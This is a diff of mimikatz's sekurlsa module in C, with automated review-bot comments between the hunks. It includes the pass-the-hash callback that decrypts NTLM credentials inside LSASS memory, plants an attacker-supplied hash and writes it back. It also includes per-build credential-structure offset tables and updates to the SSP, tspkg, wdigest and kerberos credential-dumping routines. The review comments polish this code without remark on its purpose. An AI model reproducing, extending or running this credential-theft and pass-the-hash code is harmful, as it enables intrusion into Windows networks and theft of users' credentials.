BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) (pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) (pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED) pOptionalData;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {pPrimaryCreds, &hLocalMemory};
|
||||
PBYTE msvCredentials;
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {pCredentials->Credentials.Buffer, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
const MSV1_0_PRIMARY_HELPER * helper = kuhl_m_sekurlsa_msv_helper(cLsass);
|
||||
|
||||
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
{
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pCredentials->Credentials.Buffer, pCredentials->Credentials.Length);
|
||||
if(cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10)
|
||||
if(msvCredentials = (PBYTE) pCredentials->Credentials.Buffer)
|
||||
{
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(msvCredentials, pCredentials->Credentials.Length);
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisLmOwfPassword) = FALSE;
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisShaOwPassword) = FALSE;
|
||||
if(helper->offsetToisIso)
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisIso) = FALSE;
|
||||
RtlZeroMemory(msvCredentials + helper->offsetToLmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlZeroMemory(msvCredentials + helper->offsetToShaOwPassword, SHA_DIGEST_LENGTH);
|
||||
if(pthDataCred->pthData->NtlmHash)
|
||||
{
|
||||
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds->isNtOwfPassword = TRUE;
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisNtOwfPassword) = TRUE;
|
||||
RtlCopyMemory(msvCredentials + helper->offsetToNtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
}
|
||||
else
|
||||
{
|
||||
RtlZeroMemory(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds->isNtOwfPassword = FALSE;
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisNtOwfPassword) = FALSE;
|
||||
RtlZeroMemory(msvCredentials + helper->offsetToNtOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
}
|
||||
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlZeroMemory(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH);
|
||||
pPrimaryCreds->isLmOwfPassword = FALSE;
|
||||
pPrimaryCreds->isShaOwPassword = FALSE;
|
||||
}
|
||||
else
|
||||
{
|
||||
if(pthDataCred->pthData->NtlmHash)
|
||||
{
|
||||
RtlCopyMemory(pPrimaryCreds10->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds10->isNtOwfPassword = TRUE;
|
||||
}
|
||||
else
|
||||
{
|
||||
RtlZeroMemory(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds10->isNtOwfPassword = FALSE;
|
||||
}
|
||||
RtlZeroMemory(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlZeroMemory(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH);
|
||||
pPrimaryCreds10->isIso = FALSE;
|
||||
pPrimaryCreds10->isLmOwfPassword = FALSE;
|
||||
pPrimaryCreds10->isShaOwPassword = FALSE;
|
||||
}
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pCredentials->Credentials.Buffer, pCredentials->Credentials.Length);
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(msvCredentials, pCredentials->Credentials.Length);
|
||||
|
||||
kprintf(L"data copy @ %p : ", origBufferAddress->address);
|
||||
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
kprintf(L"data copy @ %p : ", origBufferAddress->address);
|
||||
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
}
|
||||
else kprintf(L".");
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
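Review bot: `helper->offsetToisIso` is the only offset the PRIMARY branch guards with a zero test (`if(helper->offsetToisIso)`), while `offsetToisLmOwfPassword`, `offsetToisShaOwPassword`, `offsetToLmOwfPassword` and the rest are dereferenced unconditionally; that works only because `msv1_0_primaryHelper[0]` stores 0 for the build without an `isIso` field, and nothing at this call site says so. A comment on the guard would keep a future table row from breaking it silently: `/* offsetToisIso == 0: the pre-Windows-10 layout has no isIso field (msv1_0_primaryHelper[0]) */`. The mimilib copy of `kuhl_m_sekurlsa_genericCredsOutput` in the `@ -223,88 +223,62` hunk tests the same sentinel and would take the same comment. The whole callback is inside this hunk; the `else kprintf(L".")` path and the copy-back are unchanged.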
@ -110,8 +91,7 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
|
||||
|
||||
while(aLsassMemory.address)
|
||||
{
|
||||
@ -140,4 +120,22 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
aLsassMemory.address = credentials.next;
|
||||
} else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
|
||||
}
|
||||
}
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLSA_CONTEXT context)
|
||||
{
|
||||
const MSV1_0_PRIMARY_HELPER * helper;
|
||||
if(context->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507)
|
||||
helper = &msv1_0_primaryHelper[0];
|
||||
else if(context->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1511)
|
||||
helper = &msv1_0_primaryHelper[1];
|
||||
else
|
||||
helper = &msv1_0_primaryHelper[2];
|
||||
return helper;
|
||||
}
|
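Review bot: The third `msv1_0_primaryHelper` row is built from `MSV1_0_PRIMARY_CREDENTIAL_10` except its `isIso` entry, which reads `FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso)`; the row is selected for builds from KULL_M_WIN_BUILD_10_1511 upward and every other field in it comes from the `_10` struct, so this looks like a copy-paste slip rather than a deliberate cross-reference. The `_10` struct body is outside this view, so I cannot confirm the two offsets coincide today; `FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isIso)` removes the dependency on the `_OLD` layout either way. The mimilib table in the `@ -48,6 +48,24` hunk has the same entry. Since the header hunk exports only `kuhl_m_sekurlsa_msv_helper`, the table itself can be `static const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[]` so the offsets cannot be referenced or shadowed from another translation unit.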
@ -20,6 +20,21 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_OLD {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
BOOLEAN isIso;
|
||||
BOOLEAN isNtOwfPassword;
|
||||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10_OLD, *PMSV1_0_PRIMARY_CREDENTIAL_10_OLD;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
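Review bot: `MSV1_0_PRIMARY_CREDENTIAL_10_OLD` carries no comment saying which build it describes; `kuhl_m_sekurlsa_msv_helper` pairs it with builds from KULL_M_WIN_BUILD_10_1507 up to but excluding KULL_M_WIN_BUILD_10_1511, and its `align0` field doubles as the `offsetToIso` anchor in the second helper row. A header comment would make that reading explicit: `/* Windows 10 1507 (build 10240) layout; 1511 (10586) and later use MSV1_0_PRIMARY_CREDENTIAL_10. align0 is also the offsetToIso anchor in msv1_0_primaryHelper[1]. */`. The same struct is added to the mimilib header in the `@ -27,6 +27,21` hunk.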
@ -37,6 +52,19 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_HELPER {
|
||||
LONG offsetToLogonDomain;
|
||||
LONG offsetToUserName;
|
||||
LONG offsetToisIso;
|
||||
LONG offsetToisNtOwfPassword;
|
||||
LONG offsetToisLmOwfPassword;
|
||||
LONG offsetToisShaOwPassword;
|
||||
LONG offsetToNtOwfPassword;
|
||||
LONG offsetToLmOwfPassword;
|
||||
LONG offsetToShaOwPassword;
|
||||
LONG offsetToIso;
|
||||
} MSV1_0_PRIMARY_HELPER, *PMSV1_0_PRIMARY_HELPER;
|
||||
|
||||
typedef struct _MARSHALL_KEY {
|
||||
DWORD unkId;
|
||||
USHORT unk0;
|
||||
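Review bot: `MSV1_0_PRIMARY_HELPER` is added without documentation, and two of its fields carry an in-band sentinel: the first table row stores 0 in `offsetToisIso` and `offsetToIso`, and callers test `offsetToisIso` for zero before dereferencing. A comment on the struct and on those two fields would keep that contract visible: `/* byte offsets into a decrypted MSV1_0 primary credential, chosen per build by kuhl_m_sekurlsa_msv_helper */` above the typedef, and `LONG offsetToisIso; /* 0 when the layout has no isIso field */` plus the same remark on `offsetToIso`. The same struct is added to the mimilib header in the `@ -44,6 +59,21` hunk.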
@ -72,4 +100,6 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLSA_CONTEXT context);
|
@ -12,7 +12,7 @@ BYTE PTRN_WIN10_SspCredentialList[] = {0xc7, 0x46, 0x24, 0x43, 0x72, 0x64, 0x41,
|
||||
KULL_M_PATCH_GENERIC SspReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_SspCredentialList), PTRN_WIN5_SspCredentialList}, {0, NULL}, {16}},
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_SspCredentialList), PTRN_WIN6_SspCredentialList}, {0, NULL}, {20}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WIN10_SspCredentialList), PTRN_WIN10_SspCredentialList}, {0, NULL}, {16}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WIN10_SspCredentialList), PTRN_WIN10_SspCredentialList}, {0, NULL}, {16}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_SspCredentialList[] = {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
|
||||
@ -34,8 +34,7 @@ NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
ULONG monNb = 0;
|
||||
|
||||
if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, ARRAYSIZE(SspReferences), (PVOID *) &SspCredentialList, NULL, NULL, NULL))
|
||||
|
@ -34,9 +34,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_
|
||||
{
|
||||
KIWI_TS_CREDENTIAL credentials;
|
||||
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
|
||||
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
PVOID buffer = NULL;
|
||||
|
||||
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, ARRAYSIZE(TsPkgReferences), (PVOID *) &TSGlobalCredTable, NULL, NULL, NULL))
|
||||
|
@ -39,8 +39,7 @@ NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
SIZE_T taille;
|
||||
|
||||
if(kuhl_m_sekurlsa_wdigest_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_wdigest_package.Module, WDigestReferences, ARRAYSIZE(WDigestReferences), (PVOID *) &l_LogSessList, NULL, NULL, &offsetWDigestPrimary))
|
||||
|
@ -28,7 +28,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
{
|
||||
dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary);
|
||||
if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
|
||||
flags = (NtBuildNumber < KULL_M_WIN_BUILD_10) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
|
||||
else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
else
|
||||
@ -48,6 +48,24 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
}
|
||||
}
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper()
|
||||
{
|
||||
const MSV1_0_PRIMARY_HELPER * helper;
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_10_1507)
|
||||
helper = &msv1_0_primaryHelper[0];
|
||||
else if(NtBuildNumber < KULL_M_WIN_BUILD_10_1511)
|
||||
helper = &msv1_0_primaryHelper[1];
|
||||
else
|
||||
helper = &msv1_0_primaryHelper[2];
|
||||
return helper;
|
||||
}
|
||||
|
||||
const KERB_INFOS kerbHelper[] = {
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
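Review bot: `const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper()` is defined with empty parentheses, which in C declares an unprototyped function rather than a zero-argument one; the mimikatz-side version in the `@ -140,4 +120,22` hunk takes a context parameter, so the two cannot share a prototype and this one should be `const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(void)`, here and in the prototype of the `@ -44,6 +59,21` hunk. Reading `NtBuildNumber` from file scope is consistent with the other callbacks in this file, so the prototype is the only point.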
@ -117,7 +135,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlo
|
||||
{
|
||||
if(ReadMemory(ptr, data, (ULONG) kerbHelper[KerbOffsetIndex].structSize, NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (data + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, (NtBuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (data + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, (NtBuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
|
||||
if(ptr = (ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetPin))
|
||||
if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
|
||||
@ -145,7 +163,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlo
|
||||
{
|
||||
dprintf("\n\t * Key List\n");
|
||||
for(i = 0; i < keyList.cbItem; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((NtBuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10));
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((NtBuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10));
|
||||
}
|
||||
LocalFree(pHashPassword);
|
||||
}
|
||||
|
@ -27,6 +27,21 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_OLD {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
BOOLEAN isIso;
|
||||
BOOLEAN isNtOwfPassword;
|
||||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10_OLD, *PMSV1_0_PRIMARY_CREDENTIAL_10_OLD;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
@ -44,6 +59,21 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_HELPER {
|
||||
LONG offsetToLogonDomain;
|
||||
LONG offsetToUserName;
|
||||
LONG offsetToisIso;
|
||||
LONG offsetToisNtOwfPassword;
|
||||
LONG offsetToisLmOwfPassword;
|
||||
LONG offsetToisShaOwPassword;
|
||||
LONG offsetToNtOwfPassword;
|
||||
LONG offsetToLmOwfPassword;
|
||||
LONG offsetToShaOwPassword;
|
||||
LONG offsetToIso;
|
||||
